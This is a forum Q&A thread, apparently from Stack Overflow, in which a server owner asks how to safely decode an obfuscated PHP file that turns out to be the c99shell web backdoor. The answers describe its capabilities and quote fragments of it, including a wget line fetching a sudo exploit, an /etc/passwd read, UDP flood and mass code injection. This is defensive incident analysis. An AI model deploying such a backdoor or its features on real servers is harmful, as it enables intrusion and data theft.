views:

717

answers:

5

WARNING: This is a possible exploit. Do not run directly on your server if you're not sure what to do with this.

http://pastehtml.com/view/1b1m2r6.txt

I believe this was uploaded via an insecure upload script. How do I decode and uncompress this code? Running it in the browser might execute it as a shell script, open up a port or something.

I can do a base64 decode online but i couldn't really decompress it.

+24  A: 

So there's a string. It's gzipped and base64 encoded, and the code decodes the base64 and then uncompresses it.

When that's done, I am resulted with this:

<? eval(base64_decode('...')); ?>

Another layer of base64, which is 720440 bytes long.

Now, base64 decoding that, we have 506961 bytes of exploit code.

That's here: http://azabani.com/misc/stackoverflow/3708246-exploit.txt

I'm still examining the code, and will update this answer when I have more understanding. The code is huge.

Still reading through the code, and the (very well-done) exploit allows these tools to be exposed to the hacker:

  • TCP backdoor setup
  • unauthorised shell access
  • reading of all htpasswd, htaccess, password and configuration files
  • log wiping
  • MySQL access (read, write)
  • append code to all files matching a name pattern (mass exploit)
  • RFI/LFI scanner
  • UDP flooding
  • kernel information

This is probably a professional PHP-based server-wide exploit toolkit, and seeing as it's got a nice HTML interface and the whole lot, it could be easily used by a pro hacker, or even a script kiddie.

This exploit is called c99shell (thanks Yi Jiang) and it turns out to have been quite popular, being talked about and running for a few years already. There are many results on Google for this exploit.

Delan Azabani
Wow, it's a complete backdoor setup. Though the guy who uploaded it is probably another script kiddie. It was hosted directly under our apache root directory. And a real hacker would have deleted it after setting up the backdoor.
gAMBOOKa
It's got a shell script in it, a string called $backdoor, which is written out and exec'd. The PHP then tells the user this has been done and to connect with netcat.
Ninefingers
Shit like this scares me `array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),`
gAMBOOKa
@gAMBOOKa only affects sudo 1.6.8. You do regularly update your software, right...?!! `sudo -V` to find out if this affects you.
Ninefingers
My computer. *suspense* `Sudo version 1.7.2p7` *whew* Now for my grid web server. *suspense* `Sudo version 1.6.8p7` *gasp* Oh dear...
Delan Azabani
@Ninefingers : I'm safe! Thanks for the tip.
gAMBOOKa
I am going to write to MediaTemple and see what they have to say about this.
Delan Azabani
@Delan if you have access to the shell, can you not just run apt-get/yum? Distros should distribute the latest versions?
Ninefingers
I'm on a shared grid server, so even though I have shell access, I don't have permission to update packages, etc.
Delan Azabani
Update: they've come back to me and assured me that it's no problem as my account isn't in the `sudoers` so sudo can't even be used.
Delan Azabani
`Sudo version 1.6.8p12` am I vulnerable?
jyzuz
+3  A: 

First, replace the eval with an echo to see what code it would execute if you'd let it. Send the output of that script to another file, say, test2.php. In that file, do the same trick again. Run it, and it will output the complete malicious program (it's quite a beast), ~4k lines of hacker's delight.

tdammers
You're right, why didn't I think of that?!
gAMBOOKa
+13  A: 

Looking at Delan's decoded source, it appears to be a full-fledged backdoor providing a web interface that can be used to control the server in various ways. Telling fragments from the source:

echo '<center>Are you sure you want to install an IP:Port proxy on this
website/server?<br />

or

<b>Mass Code Injection:</b><br><br>
Use this to add PHP to the end of every .php page in the directory specified.

or

echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . 
     round(($pakits*65)/1024, 2) . " MB) packets averaging ". 
     round($pakits/$exec_time, 2) . " packets per second \n";

or

if (!$fp) {echo "Can't get /etc/passwd for password-list.";}

I'd advise you to scrub that server and reinstall everything from scratch.

Michael Borgwardt
+1 from me, sound advice.
Ninefingers
+6  A: 

I know Delan Azabani has done this, but just so you actually know how he got the data out:

Just in case you're wondering how to decompress this, use base64 -d filename > output to parse base64 strings and gunzip file.name.gz to parse gzipped data.

The trick is in recognising that what you've got is base64 or gunzip and decompressing the right bits.

This way it goes absolutely nowhere near a JS parser or PHP parser.

Ninefingers
Great safety tip; never let it execute.
Delan Azabani
+1  A: 

This is code for php shell.
to decode this

replace replace eval("?>". with print( run this

php5 file.php > file2.php

then replace eval with print and run in browser. http://loclhost/file2.php

jcubic